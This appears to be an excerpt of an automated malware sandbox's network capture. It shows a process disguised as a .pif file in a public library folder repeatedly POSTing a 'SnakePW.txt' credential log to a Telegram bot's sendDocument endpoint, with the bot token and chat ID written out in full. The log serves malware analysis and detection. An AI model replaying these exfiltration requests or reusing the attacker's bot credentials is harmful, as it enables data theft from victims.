Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.7 | 49897 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:00 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0ef55334ac8a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:00 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0ef55334ac8aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:01 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:01 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388930,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605961,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.7 | 49899 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:00 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f7f6e69a05f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:00 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0f7f6e69a05fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:01 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:01 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:01 UTC | 521 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388932,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605961,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.7 | 49904 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:02 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f1ddc04ff5a
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:02 UTC | 537 | OUT
                                                                                                                Data Ascii: --------------------------8dd0f1ddc04ff5aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:03 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:03 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:03 UTC | 523 | IN
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388935,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605963,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                50 | 192.168.2.7 | 49905 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:02 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f982ba92d5d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:02 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f982ba92d5dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:03 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:03 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:03 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388936,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605963,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                51 | 192.168.2.7 | 49906 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:02 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f0c03271772
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:02 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f0c03271772Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:03 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:03 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:03 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388938,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605963,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                52 | 192.168.2.7 | 49914 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:04 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f1e9f0c802f
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:04 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f1e9f0c802fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:05 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:05 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 524
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:05 UTC | 524 | IN | Data Ascii: {"ok":true,"result":{"message_id":388941,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605965,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                53 | 192.168.2.7 | 49913 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:04 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fab9e050937
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:04 UTC | 537 | OUT | Data Ascii: --------------------------8dd0fab9e050937Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
                                                                                                                2024-11-26 07:26:05 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:05 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:05 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388942,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605965,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                54 | 192.168.2.7 | 49912 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:04 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f2f0420657e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                2024-11-26 07:26:04 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f2f0420657eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
                                                                                                                2024-11-26 07:26:05 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:05 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:05 UTC | 523 | IN | Data Ascii: {"ok":true,"result":{"message_id":388944,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605965,"documen


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                55 | 192.168.2.7 | 49920 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-11-26 07:26:06 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f35250cf7bb
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
                                                                                                                2024-11-26 07:26:06 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f35250cf7bbContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
                                                                                                                2024-11-26 07:26:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:07 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                2024-11-26 07:26:07 UTC | 521 | IN | Data Ascii: {"ok":true,"result":{"message_id":388947,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605967,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.7 | 49921 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:06 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fc80cbc88b2
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:06 UTC | 537 | OUT |
                                                                                                                Data Ascii: --------------------------8dd0fc80cbc88b2Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:07 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:07 UTC | 521 | IN |
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388949,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605967,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.7 | 49922 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:06 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f440fe0220d
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:06 UTC | 537 | OUT |
                                                                                                                Data Ascii: --------------------------8dd0f440fe0220dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:07 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:07 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:07 UTC | 523 | IN |
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388950,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605967,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.7 | 49927 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:08 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f4ce99ede20
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:08 UTC | 537 | OUT |
                                                                                                                Data Ascii: --------------------------8dd0f4ce99ede20Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:09 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:09 UTC | 521 | IN |
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388954,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605969,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.7 | 49930 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:08 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f5908777d5b
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:08 UTC | 537 | OUT |
                                                                                                                Data Ascii: --------------------------8dd0f5908777d5bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:09 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 523
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:09 UTC | 523 | IN |
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388956,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605969,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.7 | 49928 | 149.154.167.220 | 443 | 7240 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:08 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0fe461bde220
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:08 UTC | 537 | OUT |
                                                                                                                Data Ascii: --------------------------8dd0fe461bde220Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:24:52Client
2024-11-26 07:26:09 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:09 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:09 UTC | 521 | IN |
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388957,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605969,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.7 | 49933 | 149.154.167.220 | 443 | 7924 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:10 UTC | 358 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f63476ff6d9
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
                                                                                                                Connection: Keep-Alive
2024-11-26 07:26:10 UTC | 537 | OUT |
                                                                                                                Data Ascii: --------------------------8dd0f63476ff6d9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 04:03:12Client
2024-11-26 07:26:11 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:11 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 07:26:11 UTC | 521 | IN |
                                                                                                                Data Ascii: {"ok":true,"result":{"message_id":388959,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1732605971,"documen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.7 | 49935 | 149.154.167.220 | 443 | 7660 | C:\Users\Public\Libraries\yihfsboC.pif
Timestamp | Bytes transferred | Direction | Data
2024-11-26 07:26:10 UTC | 334 | OUT | POST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                Content-Type: multipart/form-data; boundary=------------------------8dd0f6f3c5dd29e
                                                                                                                Host: api.telegram.org
                                                                                                                Content-Length: 537
2024-11-26 07:26:10 UTC | 537 | OUT | Data Ascii: --------------------------8dd0f6f3c5dd29eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:899552Date and Time: 26/11/2024 / 02:25:04Client
2024-11-26 07:26:11 UTC | 388 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Tue, 26 Nov 2024 07:26:11 GMT
                                                                                                                Content-Type: application/json
                                                                                                                Content-Length: 521
                                                                                                                Connection: close
                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
